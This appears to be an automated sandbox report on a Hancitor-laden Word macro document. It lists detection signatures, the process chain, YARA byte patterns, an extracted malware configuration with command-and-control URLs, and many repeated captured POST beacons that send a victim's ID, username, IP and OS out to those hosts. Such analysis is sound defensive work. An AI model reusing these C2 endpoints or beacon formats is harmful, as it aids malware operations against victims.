Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 0427_5079687843613.doc

Overview

General Information

Sample Name:0427_5079687843613.doc
Analysis ID:399782
MD5:9585b5f35b03d5339fb26585134c55c6
SHA1:33871087ad9d69c46b1280f350d2e00105617701
SHA256:632752c9d2297bd6b6467bd7b93f10c99716456f31e4bf314794f2ab6aeed0a8
Infos:

Most interesting Screenshot:

Detection

Hancitor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
May check the online IP address of the machine
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2260 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • rundll32.exe (PID: 2480 cmdline: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2504 cmdline: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "2604_gthewq", "C2 list": ["http://caperesto.com/8/forum.php", "http://watiounds.ru/8/forum.php", "http://thuniopme.ru/8/forum.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
    00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
      00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmpHancitorHancitor Payloadkevoreilly
      • 0x1d6f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
      00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
        00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmpHancitorHancitor Payloadkevoreilly
        • 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
        Click to see the 1 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.rundll32.exe.1c0000.3.raw.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
          3.2.rundll32.exe.1c0000.3.raw.unpackHancitorHancitor Payloadkevoreilly
          • 0x1d6f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
          3.2.rundll32.exe.1b0000.2.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
            3.2.rundll32.exe.1b0000.2.unpackHancitorHancitor Payloadkevoreilly
            • 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
            3.2.rundll32.exe.1c0000.3.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
              Click to see the 7 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: http://gru77.ru/6fdsg45ehdf.exeAvira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmpMalware Configuration Extractor: Hancitor {"Campaign Id": "2604_gthewq", "C2 list": ["http://caperesto.com/8/forum.php", "http://watiounds.ru/8/forum.php", "http://thuniopme.ru/8/forum.php"]}
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\furmt.fJoe Sandbox ML: detected
              Source: 3.2.rundll32.exe.1c0000.3.unpackAvira: Label: TR/Hijacker.Gen
              Source: 3.2.rundll32.exe.c0174.0.unpackAvira: Label: TR/Kazy.4159236

              Location Tracking:

              barindex
              Yara detected HancitorShow sources
              Source: Yara matchFile source: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2504, type: MEMORY
              Source: Yara matchFile source: 3.2.rundll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1b0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1c0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.c0174.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.c0174.0.raw.unpack, type: UNPACKEDPE
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C2CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2CD0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C2D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2D17
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C2D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2D55
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C2D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2D78
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C2D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2D98
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018487C GetModuleHandleA,7248FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_0018487C

              Software Vulnerabilities:

              barindex
              Document exploit detected (drops PE files)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: furmt.f.0.drJump to dropped file
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe
              Source: global trafficDNS query: name: api.ipify.org
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 50.16.249.42:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 50.16.249.42:80

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://caperesto.com/8/forum.php
              Source: Malware configuration extractorURLs: http://watiounds.ru/8/forum.php
              Source: Malware configuration extractorURLs: http://thuniopme.ru/8/forum.php
              May check the online IP address of the machineShow sources
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
              Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
              Source: Joe Sandbox ViewASN Name: RECONNRU RECONNRU
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
